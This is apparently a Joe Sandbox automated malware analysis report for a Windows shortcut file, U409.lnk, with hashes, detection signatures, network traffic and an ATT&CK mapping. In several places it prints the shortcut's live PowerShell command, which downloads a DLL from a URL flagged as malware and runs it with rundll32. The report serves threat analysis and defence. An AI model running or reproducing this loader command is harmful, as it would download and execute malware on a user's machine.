Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U409.lnk

Overview

General Information

Sample Name:U409.lnk
Analysis ID:626149
MD5:d4bda79d6f9b6edc1de19675054412bc
SHA1:1121c9c0977f67d605e5dcf740f5f5a8465c0f1d
SHA256:32add7446a9293f42c2db5b95afa2d722fb0b8a94baa6d4804e5d652a897fd7c
Tags:lnk
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 5236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 3108 cmdline: "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: U409.lnkVirustotal: Detection: 30%Perma Link
Source: U409.lnkReversingLabs: Detection: 26%
Source: https://focusagd.net/4REat6sBv0/1.pngAvira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 192.185.131.124:443 -> 192.168.2.5:49747 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /4REat6sBv0/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: focusagd.netConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownHTTPS traffic detected: 192.185.131.124:443 -> 192.168.2.5:49747 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: powershell.exe, 00000000.00000002.461352911.000001B2AC758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.457054218.000001B29538C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusagd.net
Source: powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.452137911.000001B294621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.457013853.000001B295377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://focusagd.net
Source: PowerShell_transcript.305090.0TyhnxeB.20220513164423.txt.0.drString found in binary or memory: https://focusagd.net/4REat6sBv0/1.png
Source: powershell.exe, 00000000.00000002.461543157.000001B2ACA6B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451743155.000001B292700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451773245.000001B29275A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.451955432.000001B2929B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://focusagd.net/4REat6sBv0/1.png-OutFile$env:TEMP
Source: powershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://focusagd.net/4REat6sBv0/1.png0y
Source: powershell.exe, 00000000.00000002.451842036.000001B292777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://focusagd.net/4REat6sBv0/1.png1.0
Source: powershell.exe, 00000000.00000002.457013853.000001B295377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://focusagd.netx
Source: powershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.460661565.000001B295B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: focusagd.net
Source: global trafficHTTP traffic detected: GET /4REat6sBv0/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: focusagd.netConnection: Keep-Alive

System Summary

barindex
Source: Initial fileStrings: https://focusagd.net/4REat6sBv0/1.png
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9F1B30CBD0_2_00007FF9F1B30CBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9F1B318780_2_00007FF9F1B31878
Source: U409.lnkVirustotal: Detection: 30%
Source: U409.lnkReversingLabs: Detection: 26%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220513Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyctevpv.ahu.ps1Jump to behavior
Source: classification engineClassification label: mal72.rans.winLNK@4/6@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest https://focusagd.net/4REat6sBv0/1.png -OutFile $env:TEMP\file120.dll;Start-Process rundll32 $env:TEMP\file120.dll,DllInstall

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6870Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2595Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4240Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.461494127.000001B2ACA0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\file120.dll DllInstall Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
PowerShell
Path Interception11
Process Injection
1
Masquerading
OS Credential Dumping1
Query Registry
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager11
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Rundll32
NTDS21
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Application Window Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
Remote System Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
System Information Discovery
Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
U409.lnk31%VirustotalBrowse
U409.lnk27%ReversingLabsWin32.Trojan.GenAutorunLnkFile
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
focusagd.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://focusagd.net/4REat6sBv0/1.png2%VirustotalBrowse
https://focusagd.net/4REat6sBv0/1.png100%Avira URL Cloudmalware
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://focusagd.net/4REat6sBv0/1.png0y0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
http://focusagd.net0%VirustotalBrowse
http://focusagd.net0%Avira URL Cloudsafe
https://focusagd.net/4REat6sBv0/1.png-OutFile$env:TEMP0%Avira URL Cloudsafe
https://focusagd.net0%Avira URL Cloudsafe
https://focusagd.net/4REat6sBv0/1.png1.00%Avira URL Cloudsafe
https://focusagd.netx0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
focusagd.net
192.185.131.124
truetrueunknown
NameMaliciousAntivirus DetectionReputation
https://focusagd.net/4REat6sBv0/1.pngtrue
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.461042349.000001B2A4685000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.452491884.000001B294832000.00000004.00000800.00020000.00000000.sdmpfalse
      high
